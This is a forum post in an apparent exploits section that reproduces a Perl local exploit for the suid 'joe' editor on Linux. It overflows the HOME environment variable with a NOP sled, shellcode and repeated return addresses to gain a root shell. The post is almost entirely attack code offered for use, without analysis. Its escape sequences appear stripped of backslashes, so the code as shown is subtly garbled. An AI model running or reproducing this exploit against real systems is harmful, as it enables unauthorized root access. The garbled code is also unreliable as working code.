Jump to content
mario23

linux JOE local exploit

By mario23, in Exploituri

Recommended Posts

mario23 Newbie

mario23

Posted
Posted
#!/usr/bin/perl

# ***

#  __________               ___ ___  

#  ______   __ __  ______/   |    

#   |       _/  |  /  ___/    _    

#   |    |     |  /___         /

#   |____|_  /____//____  >___|_  /  

#          /           /       /  

# ***

# r57joe.pl

# Linux "joe" local exploit

# by 1dt.w0lf // RusH security team

# ***

# usage: ./joe [offset]

# by default offset = -1000 : tested on ASPlinux 9.0

$len=1056;

$ret = 0xbfffffb1;

$offset = -1000;

$nop = "x90";

# proof of concept

$shellcode ="x31xdbx89xd8xb0x17xcdx80" .

           "x31xdbx89xd8xb0x2excdx80" .

           "xebx1fx5fx89xfcx66xf7xd4x31xc0x8ax07" .

           "x47x57xaex75xfdx88x67xffx48x75xf6x5b" .

           "x53x50x5ax89xe1xb0x0bxcdx80xe8xdcxff" .

           "xffxffx01x2fx74x6dx70x2fx73x68x01";

if(@ARGV != 1)

{

print "-----------------------------n";

print "*** joe.pln";

print "*** linux joe local exploitn";

print "*** usage: ./joe.pl [offset]n";

print "*** offset -1000 : tested on ASPLinux 9.0n";

print "-----------------------------n";

exit();

}

if (@ARGV == 1)

{

$offset = $ARGV[0];

}

if( ! -u "/usr/bin/joe" )

{

       print "joe is not suid =(((n";

       exit();

}

for ($i = 0; $i < ($len - length($shellcode) - 156); $i++)

     {

    $buffer .= $nop;

     }

$buffer .= $shellcode;

$pack_ret = pack('l', ($ret + $offset));

chomp($pack_ret);

for($i = 0; $i < 156; $i += 4)

    {

    $buffer .= $pack_ret;

    }

print "-----------------------------n";

print "*** joe local exploit by r57n";

print "-----------------------------n";

print "OFFSET : $offsetn";

print "-----------------------------n";

local($ENV{'HOME'}) = $buffer;

exec("/usr/bin/joe");

# EOF

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...